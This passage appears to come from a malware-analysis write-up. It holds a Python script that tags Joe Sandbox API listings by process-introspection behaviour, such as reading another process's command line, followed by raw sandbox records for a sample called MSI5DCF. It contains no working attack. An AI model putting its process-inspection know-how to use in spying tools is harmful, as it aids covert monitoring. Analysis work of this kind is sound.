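STRING_LINE = re.compile(r"^\s*•\s*(?P<s>.+?), xrefs: (?P<ref>[0-9A-F]+)\s*$")

# Win32 PROCESS_* access rights, used to decode OpenProcess's first argument.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def parse_records(text):
    """Split the listing at each 'APIs' header into records, each a dict with
    'apis' (parsed call lines; 'direct' is False for subcall attributions) and
    'strings' (names from the record's Strings section)."""
    records, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": [], "strings": []}
            records.append(current)
            section = "apis"
        elif stripped == "Strings":
            section = "strings"
        elif stripped == "Memory Dump Source":
            section = None  # the remaining fields of a record are metadata
        elif current is not None and section == "apis":
            m = API_LINE.match(line)
            if m:
                raw = m["args"]
                args = [a.strip() for a in raw.split(",")] if raw is not None else []
                current["apis"].append({"api": m["api"], "mod": m["mod"], "args": args,
                                        "ref": m["ref"], "direct": m["sub"] is None})
        elif current is not None and section == "strings":
            m = STRING_LINE.match(line)
            if m:
                current["strings"].append(m["s"])
    return records


def decode_access(mask_hex):
    """Turn an OpenProcess access-mask argument into PROCESS_* names ('?' if unknown)."""
    try:
        mask = int(mask_hex, 16)
    except ValueError:
        return ["?"]
    names = [name for bit, name in PROCESS_ACCESS.items() if mask & bit]
    return names or [f"0x{mask:X}"]


def fmt_size(arg):
    """Render a hex size argument as 0x..., leaving unresolved '?' arguments as-is."""
    try:
        return f"0x{int(arg, 16):X}"
    except ValueError:
        return arg


def classify(record):
    """Tag a record by the capabilities its *direct* calls imply (editor's rules)."""
    direct = [c for c in record["apis"] if c["direct"]]
    names = {c["api"] for c in direct}
    tags = []
    for c in direct:
        if c["api"] == "OpenProcess" and c["args"]:
            tags.append("opens-process:" + "|".join(decode_access(c["args"][0])))
    if {"OpenProcess", "GetProcessTimes"} <= names:
        tags.append("queries-process-times")
    resolves_nqip = any(c["api"] == "GetProcAddress" and "NtQueryInformationProcess" in c["args"]
                        for c in direct)
    if resolves_nqip and "ReadProcessMemory" in names:
        # 4th argument of ReadProcessMemory is nSize; fixed sizes hint at which structs are read.
        sizes = [fmt_size(c["args"][3]) for c in direct
                 if c["api"] == "ReadProcessMemory" and len(c["args"]) > 3]
        tags.append("reads-foreign-process-memory:" + ",".join(sizes))
    return tags


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_LISTING), 1):
        print(f"record {i}: {classify(rec) or ['no process-introspection tags']}")
```

Run it and it prints one tag line per record: the first is tagged with PROCESS_QUERY_INFORMATION and `queries-process-times`, the second with `reads-foreign-process-memory:0x1D8,0x48`. Only direct calls are scored because the plugin also lists callee APIs under "Part of subcall function", which would otherwise make every caller of a helper inherit its tags. The 0x48-byte read is the editor's reading of the sizes, not a statement from the report: 0x48 is the length of an x86 RTL_USER_PROCESS_PARAMETERS up to and including its CommandLine member, which is why a GetProcAddress(NtQueryInformationProcess) / ReadProcessMemory chain with that size usually means the sample is reading another process's command line from its PEB.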
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AED498
                                                                        • _Maklocstr.LIBCPMT ref: 00AED501
                                                                        • _Maklocstr.LIBCPMT ref: 00AED513
                                                                        • _Maklocchr.LIBCPMT ref: 00AED52B
                                                                        • _Maklocchr.LIBCPMT ref: 00AED53B
                                                                        • _Getvals.LIBCPMT ref: 00AED55D
                                                                          • Part of subcall function 00AE708B: _Maklocchr.LIBCPMT ref: 00AE70BA
                                                                          • Part of subcall function 00AE708B: _Maklocchr.LIBCPMT ref: 00AE70D0
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 3549167292-2658103896
                                                                        • Opcode ID: be89c98ec3d49c7f749507dffcee9e639b121222953f2d3582f1faf394aea022
                                                                        • Instruction ID: c6d60d66146644e2b7b29a194bc29ceab16ec107ab81623858f3f27b1c563acb
                                                                        • Opcode Fuzzy Hash: be89c98ec3d49c7f749507dffcee9e639b121222953f2d3582f1faf394aea022
                                                                        • Instruction Fuzzy Hash: 81217172D00358AADF15EFE5D946ADE7BB8AF04710F008056B9199F192EA709940CBA1
                                                                        APIs
                                                                          • Part of subcall function 00AE5C66: __EH_prolog3.LIBCMT ref: 00AE5C6D
                                                                          • Part of subcall function 00AE5C66: std::_Lockit::_Lockit.LIBCPMT ref: 00AE5C78
                                                                          • Part of subcall function 00AE5C66: std::locale::_Setgloballocale.LIBCPMT ref: 00AE5C93
                                                                          • Part of subcall function 00AE5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5CE6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADCA1A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADCA80
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADCB4F
                                                                          • Part of subcall function 00AE45A7: __EH_prolog3.LIBCMT ref: 00AE45AE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCC00
                                                                        • LocalFree.KERNEL32(?,?,?,00B2B6C9,00000000,00B2B6C9), ref: 00ADCD01
                                                                        • __cftoe.LIBCMT ref: 00ADCE5E
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2085124900-1405518554
                                                                        • Opcode ID: 35a7fb2f0d7db1b7f8511e39f4687530704fa2cbfcdddb330f517129d8ce2155
                                                                        • Instruction ID: d10c11b22afbc8a2b36498847bb341b522473ff3457fca4bcf8c64bc8603d7a8
                                                                        • Opcode Fuzzy Hash: 35a7fb2f0d7db1b7f8511e39f4687530704fa2cbfcdddb330f517129d8ce2155
                                                                        • Instruction Fuzzy Hash: B4128F71D00249DFDF10DFA8C985BAEBBF5EF08314F54416AE856AB381E735AA04CB91
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00AFB34B
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00AFB459
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00AFB5AB
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00AFB5C6
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2751267872-393685449
                                                                        • Opcode ID: ae007ea8b452dd58eedf77551b00db4af0a64da59b462a003df2941824259db9
                                                                        • Instruction ID: e2362095ff389db7d2b9cd421c508504d44f2759c9a3f72f7d42526d31c5c1ef
                                                                        • Opcode Fuzzy Hash: ae007ea8b452dd58eedf77551b00db4af0a64da59b462a003df2941824259db9
                                                                        • Instruction Fuzzy Hash: BDB1897181021DEFCF14DFE4C9819BEBBB5BF14310B14415AFA166B212C735DA61CBA2
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AE0322
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AE0367
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AE03DE
                                                                        • LocalFree.KERNEL32(?), ref: 00AE041B
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,B7207CF4,B7207CF4,?,?), ref: 00AE0546
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree$___std_exception_copy
                                                                        • String ID: ios_base::failbit set$iostream
                                                                        • API String ID: 2276494016-302468714
                                                                        • Opcode ID: 7947cb2c3e73bd599d48c44309cc1d33030ff3f23874c3723e3ec958366c3233
                                                                        • Instruction ID: 2681f9a274739714facb0f85b31e3406296e8131f42c71659fa918f4a7bc56b2
                                                                        • Opcode Fuzzy Hash: 7947cb2c3e73bd599d48c44309cc1d33030ff3f23874c3723e3ec958366c3233
                                                                        • Instruction Fuzzy Hash: 44A1A3B1D00249DFDB08DFA9D985BAEFBB5FB48310F10825DE915AB391DB709980CB91
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000044,B7207CF4,?,00000000), ref: 00ADBA8B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADBAC8
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADBB35
                                                                        • __Getctype.LIBCPMT ref: 00ADBB7E
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADBBF2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBCAF
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3635123611-1405518554
                                                                        • Opcode ID: 81665f490b674860e9af1de934ada27682bae1208884b1f44b795a6bf9a50515
                                                                        • Instruction ID: c3fa5e4e3efc73150d06ca0ebf71bf0fc5debd0f63b0c4101ed56d8aabbe1b71
                                                                        • Opcode Fuzzy Hash: 81665f490b674860e9af1de934ada27682bae1208884b1f44b795a6bf9a50515
                                                                        • Instruction Fuzzy Hash: 3E8193B1D14388DFEB20CFA8CA4579EBBF4BF14314F148199D445AB382EB759A44CB61
APIs
• LocalAlloc.KERNEL32(00000040,00000018,B7207CF4,?,00000000,?,?,?,?,?,?,?,00000000,00B1ABC5,000000FF), ref: 00ADC264
• std::_Lockit::_Lockit.LIBCPMT ref: 00ADC29E
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC302
• __Getctype.LIBCPMT ref: 00ADC34B
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADC391
• std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC445
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 3635123611-1405518554
• Opcode ID: ddf36345b7e718d9a5cc6863041e5eae4e3693b4a79504a3780d6f65bcff5c90
• Instruction ID: 70db40b0f0107cdcf81aea89cb60124e72b657a1795c2eb7d08c376bdc39cc16
• Opcode Fuzzy Hash: ddf36345b7e718d9a5cc6863041e5eae4e3693b4a79504a3780d6f65bcff5c90
• Instruction Fuzzy Hash: 74618FB0D01288EFEB10DFE8C6497DEBBF4AF15314F148199E455AB381D7B59A08CB51
APIs
• GetCPInfo.KERNEL32(?,?), ref: 00AF74C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF7557
• __alloca_probe_16.LIBCMT ref: 00AF7581
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF75C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF75E3
• __alloca_probe_16.LIBCMT ref: 00AF7609
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF7646
• CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00AF7663
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
• String ID:
• API String ID: 3603178046-0
• Opcode ID: 598cec2fd1afd996df3bce5f69329612f2eb058bc739864ca5cfb570ff301343
• Instruction ID: f9d7fb0bb048cd908fbade603580ab0b2463ec7dd11f25d12d4f653c77af3a59
• Opcode Fuzzy Hash: 598cec2fd1afd996df3bce5f69329612f2eb058bc739864ca5cfb570ff301343
• Instruction Fuzzy Hash: 9F71807290865EABDF219FE8CC55AFE7BB6AF49354F284025FA05E7150DB35C801CB60
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00ADC6DF,?,00000001,00000000,?,00000000,?,00ADC6DF,?), ref: 00AF6F6C
• __alloca_probe_16.LIBCMT ref: 00AF6F98
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F,?), ref: 00AF6FD7
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF6FF4
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF7033
• __alloca_probe_16.LIBCMT ref: 00AF7050
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F), ref: 00AF7092
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F,?), ref: 00AF70B5
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 6dae7cbe74436767421f0cd2559242bb7d717d0bd046d3c72b82af00da21ff4c
• Instruction ID: 0f3b8688d37c40578282b9e608974702d186afe29f713ef8fa62ae8621897285
• Opcode Fuzzy Hash: 6dae7cbe74436767421f0cd2559242bb7d717d0bd046d3c72b82af00da21ff4c
• Instruction Fuzzy Hash: 98519C7290420AABEB209FA4DC45FBF7BA9EF44790F214129FA05A7190DF319D108B60
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,B7207CF4,?,00000004), ref: 00AD59AA
• LocalFree.KERNEL32(?), ref: 00AD5ABB
• MoveFileW.KERNEL32(?,00000000), ref: 00AD5D5B
• DeleteFileW.KERNEL32(?), ref: 00AD5DA3
Similarity
• API ID: File$DeleteFreeLocalMoveNameTemp
• String ID: URL$url
• API String ID: 1622375482-346267919
• Opcode ID: 7dca5824a142034ea8e04d93d51f56677eb9a1bb61d4854a4653491093788559
• Instruction ID: e523cd69efb788f92faac990b90c0bd571883e6ce6389b3766129e58d99791e2
• Opcode Fuzzy Hash: 7dca5824a142034ea8e04d93d51f56677eb9a1bb61d4854a4653491093788559
• Instruction Fuzzy Hash: 16025970E146699BCB24DF28CD98BADB7B5BF54304F1042DAD40AA7251EB74ABC4CF90
APIs
• LocalAlloc.KERNEL32(00000040,0000000C,B7207CF4,?,00000000,00000000,?,?,?,?,00000000,00B1B2D1,000000FF,?,00ADEBCA,00000000), ref: 00ADF624
• std::_Lockit::_Lockit.LIBCPMT ref: 00ADF65A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF6BE
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF77E
• std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF832
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2968629171-1405518554
• Opcode ID: 03a6ee4bbc7178ac0bad974f9b64aa6c0c323efc2ee734e336ad83c2ff919c7e
• Instruction ID: d4eec54bc95dc9bc0f913f7698ea0f659293910892bd3fce34725603afa4b5ca
• Opcode Fuzzy Hash: 03a6ee4bbc7178ac0bad974f9b64aa6c0c323efc2ee734e336ad83c2ff919c7e
• Instruction Fuzzy Hash: A9717DB0D01288EEEF11DFA8C9847DEBBF4AF15314F1441AAE415AB381D7B59A04DBA1
APIs
• LocalAlloc.KERNEL32(00000040,00000008,B7207CF4,?,00000000,00000000,?,?,?,00000000,00B1B1DD,000000FF,?,00ADED0A,00000000,?), ref: 00ADF3F4
• std::_Lockit::_Lockit.LIBCPMT ref: 00ADF42A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF48E
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF4FE
• std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF5B2
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2968629171-1405518554
• Opcode ID: 0d71e64e9b7aadfa5018ce978c8f834b792959ada42e05c5681bee95b72f0d91
• Instruction ID: 4ebf4506cc0a72f216b04e73ba37c14ad65d36633ba63cfc9a707f3e10809a5f
• Opcode Fuzzy Hash: 0d71e64e9b7aadfa5018ce978c8f834b792959ada42e05c5681bee95b72f0d91
• Instruction Fuzzy Hash: E0617EB0D01288EEEF10CFA9DA487DEBBF4AF14314F1441AAE455AB381D7759B04CB61
APIs
• _ValidateLocalCookies.LIBCMT ref: 00AF8D67
• ___except_validate_context_record.LIBVCRUNTIME ref: 00AF8D6F
• _ValidateLocalCookies.LIBCMT ref: 00AF8DF8
• __IsNonwritableInCurrentImage.LIBCMT ref: 00AF8E23
• _ValidateLocalCookies.LIBCMT ref: 00AF8E78
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: de08907287f7aeb9b9439dc2878629cca7e5b2ace03005ecbf50d87ce30d5f5a
• Instruction ID: 7a1051feab6d3de09fc6484c09e5e10dc4dc7d05c0c3f6dd00d6daa7dfd08f2a
• Opcode Fuzzy Hash: de08907287f7aeb9b9439dc2878629cca7e5b2ace03005ecbf50d87ce30d5f5a
• Instruction Fuzzy Hash: 8741A734A0020CDFCF10DFA8C885AAE7BB6AF45314F148455FA149B392DB35DA01CB91
APIs
• FreeLibrary.KERNEL32(00000000,?,00B0CA78,?,?,?,00000000,?,?,00B0CCA2,00000021,FlsSetValue,00B21E00,00B21E08,?), ref: 00B0CA2C
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: e77982faeacdd7182243b30b9a09be0334274174f8ef6cb754bc3dcfc201baf6
• Instruction ID: 2249179914c16eaab8703bb19b94facf1a5b0aa75f2c68421e9e1a5f53f6e853
• Opcode Fuzzy Hash: e77982faeacdd7182243b30b9a09be0334274174f8ef6cb754bc3dcfc201baf6
• Instruction Fuzzy Hash: 7A21D832B01215ABC722D7A5AC54B9A3FD8DB557A0F750390ED05B72E0EB30ED01C6A0
APIs
• __EH_prolog3.LIBCMT ref: 00AED8FD
• ctype.LIBCPMT ref: 00AED944
  • Part of subcall function 00AED458: __Getctype.LIBCPMT ref: 00AED467
  • Part of subcall function 00AE79C9: __EH_prolog3.LIBCMT ref: 00AE79D0
  • Part of subcall function 00AE79C9: std::_Lockit::_Lockit.LIBCPMT ref: 00AE79DA
  • Part of subcall function 00AE79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7A4B
  • Part of subcall function 00AE7AF3: __EH_prolog3.LIBCMT ref: 00AE7AFA
  • Part of subcall function 00AE7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B04
  • Part of subcall function 00AE7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7B75
  • Part of subcall function 00AE7CB2: __EH_prolog3.LIBCMT ref: 00AE7CB9
  • Part of subcall function 00AE7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7CC3
  • Part of subcall function 00AE7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7D34
  • Part of subcall function 00AE7C1D: __EH_prolog3.LIBCMT ref: 00AE7C24
  • Part of subcall function 00AE7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7C2E
  • Part of subcall function 00AE7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C9F
  • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
  • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
  • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
• collate.LIBCPMT ref: 00AEDA78
• numpunct.LIBCPMT ref: 00AEDCF2
  • Part of subcall function 00AE838F: __EH_prolog3.LIBCMT ref: 00AE8396
  • Part of subcall function 00AE80C5: __EH_prolog3.LIBCMT ref: 00AE80CC
  • Part of subcall function 00AE80C5: std::_Lockit::_Lockit.LIBCPMT ref: 00AE80D6
  • Part of subcall function 00AE80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8147
  • Part of subcall function 00AE81EF: __EH_prolog3.LIBCMT ref: 00AE81F6
  • Part of subcall function 00AE81EF: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8200
  • Part of subcall function 00AE81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8271
  • Part of subcall function 00AE4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
  • Part of subcall function 00AE75B6: __EH_prolog3.LIBCMT ref: 00AE75BD
  • Part of subcall function 00AE75B6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE75C7
  • Part of subcall function 00AE75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7638
• __Getcoll.LIBCPMT ref: 00AEDAB8
  • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
  • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
  • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
• codecvt.LIBCPMT ref: 00AEDDA3
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                        • String ID:
                                                                        • API String ID: 613171289-0
                                                                        • Opcode ID: 57a24d5103e952770e2af8a971bc08969255abe7a2ae34bb141a37e5bc13add1
                                                                        • Instruction ID: cb598b18f777bfcc9659dcdeb01038e17b2e355d686953c0cbaa5ceb8fc1887a
                                                                        • Opcode Fuzzy Hash: 57a24d5103e952770e2af8a971bc08969255abe7a2ae34bb141a37e5bc13add1
                                                                        • Instruction Fuzzy Hash: 3BE1F3B19002869FDB11AFA68D026BF7EB9FF45390F25446EF8596B381EF308D109791
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AED8FD
                                                                        • ctype.LIBCPMT ref: 00AED944
                                                                          • Part of subcall function 00AED458: __Getctype.LIBCPMT ref: 00AED467
                                                                        • collate.LIBCPMT ref: 00AEDA78
                                                                        • __Getcoll.LIBCPMT ref: 00AEDAB8
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$AllocGetcollGetctypeH_prolog3LocalLockit::_Lockit::~_collatectype
                                                                        • String ID:
                                                                        • API String ID: 735909071-0
                                                                        • Opcode ID: 18ad3092a563a5177383fe28207b76f441aa1fb9845e4bdcad55ace4bf523fb8
                                                                        • Instruction ID: faa54a05d644ed33956b572e82424ecf7740f33ab1568009893c8a9be276b350
                                                                        • Opcode Fuzzy Hash: 18ad3092a563a5177383fe28207b76f441aa1fb9845e4bdcad55ace4bf523fb8
                                                                        • Instruction Fuzzy Hash: D6C1D2B190028ADFCB11AFA68D026BF7EB5FF44390F25452EE9596B381EF708900C791
                                                                        APIs
                                                                        • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00AD2C43
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2CA2
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2D0C
                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00AD2E94
                                                                          • Part of subcall function 00AD3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00AD3DA3
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2E13
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2E6B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                        • String ID:
                                                                        • API String ID: 2665452496-0
                                                                        • Opcode ID: b048d5c17c0039fd38d184eeeb9ac0e0c1beab54ada5308d34e5b33fb5359939
                                                                        • Instruction ID: 712b069393e2000414ac10c8fa285d8d655338c4837ce565202a53a8c8874149
